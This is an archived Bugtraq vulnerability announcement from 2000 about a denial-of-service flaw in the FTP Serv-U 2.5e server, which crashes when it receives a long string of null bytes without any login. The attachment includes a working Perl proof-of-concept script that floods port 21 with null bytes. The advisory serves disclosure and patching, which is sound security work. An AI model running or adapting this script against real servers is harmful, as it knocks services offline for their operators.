[16080] in bugtraq
FTP Serv-U 2.5e vulnerability.
daemon@ATHENA.MIT.EDU (Blue Panda)
Fri Aug 4 11:52:40 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0018_01BFFDE1.78895BC0"
Message-Id: <001b01bffd8d$aa5e8340$0101a8c0@michael>
Date: Fri, 4 Aug 2000 06:59:02 +1000
Reply-To: Blue Panda <bluepanda@DWARF.BOX.SK>
From: Blue Panda <bluepanda@DWARF.BOX.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0018_01BFFDE1.78895BC0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
=================================================================
Blue Panda Vulnerability Announcement: FTP Serv-U 2.5e
04/08/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================
Problem: Denial of service. See attached file for details.
------=_NextPart_000_0018_01BFFDE1.78895BC0
Content-Type: text/plain;
name="servu25e.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="servu25e.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Blue Panda Vulnerability Announcement: FTP Serv-U 2.5e
04/08/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: Sending FTP Serv-U a string containing a large number of null =
bytes
will cause it to stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. A valid user/pass =
combination is
not required to take advantage of this vulnerability.
Vulnerable: FTP Serv-U 2.5e, possibly prior versions (untested).
Immune: FTP Serv-U 2.5f.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proof of concept:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use IO::Socket;
$host =3D "ftp.host.com";
$port =3D "21";
print "Connecting to $host:$port...";
$socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$host, =
PeerPort=3D>$port) || die "failed.\n";
print "done.\n";
$counter =3D 0;
$buf =3D "";
while ($counter < 5000) {
$buf .=3D "\x00";
$counter +=3D 1;
}
print $socket "$buf\n";
sleep(4);
close($socket);
------=_NextPart_000_0018_01BFFDE1.78895BC0--
